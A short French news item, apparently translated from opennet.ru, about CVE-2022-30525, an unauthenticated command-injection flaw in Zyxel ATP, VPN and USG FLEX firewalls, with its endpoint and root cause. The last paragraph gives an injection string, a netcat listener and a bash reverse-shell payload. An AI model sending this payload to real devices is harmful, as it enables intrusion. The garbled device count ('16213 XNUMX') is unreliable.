Une vulnérabilité critique (CVE-2022-30525) a été identifiée dans les appareils Zyxel des séries ATP, VPN et USG FLEX, conçus pour organiser le fonctionnement des pare-feu, IDS et VPN dans les entreprises, qui permet à un attaquant externe d'exécuter du code sur le appareil sans droits d’utilisateur sans authentification. Pour mener une attaque, un attaquant doit être capable d'envoyer des requêtes à l'appareil en utilisant le protocole HTTP/HTTPS. Zyxel a corrigé la vulnérabilité dans la mise à jour du firmware ZLD 5.30. Selon le service Shodan, il existe actuellement 16213 XNUMX appareils potentiellement vulnérables sur le réseau mondial qui acceptent les requêtes via HTTP/HTTPS.
L'opération s'effectue en envoyant des commandes spécialement conçues au gestionnaire web /ztp/cgi-bin/handler, accessible sans authentification. Le problème est dû au manque de nettoyage approprié des paramètres de requête lors de l'exécution de commandes sur le système à l'aide de l'appel os.system utilisé dans la bibliothèque lib_wan_settings.py et exécuté lors du traitement de l'opération setWanPortSt.
Par exemple, un attaquant pourrait transmettre la chaîne « ; ping192.168.1.210;" ce qui conduira à l’exécution de la commande « ping 192.168.1.210 » sur le système. Pour accéder au shell de commande, vous pouvez exécuter « nc -lvnp 1270 » sur votre système, puis lancer une connexion inversée en envoyant une requête à l'appareil avec le '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.
Source: opennet.ru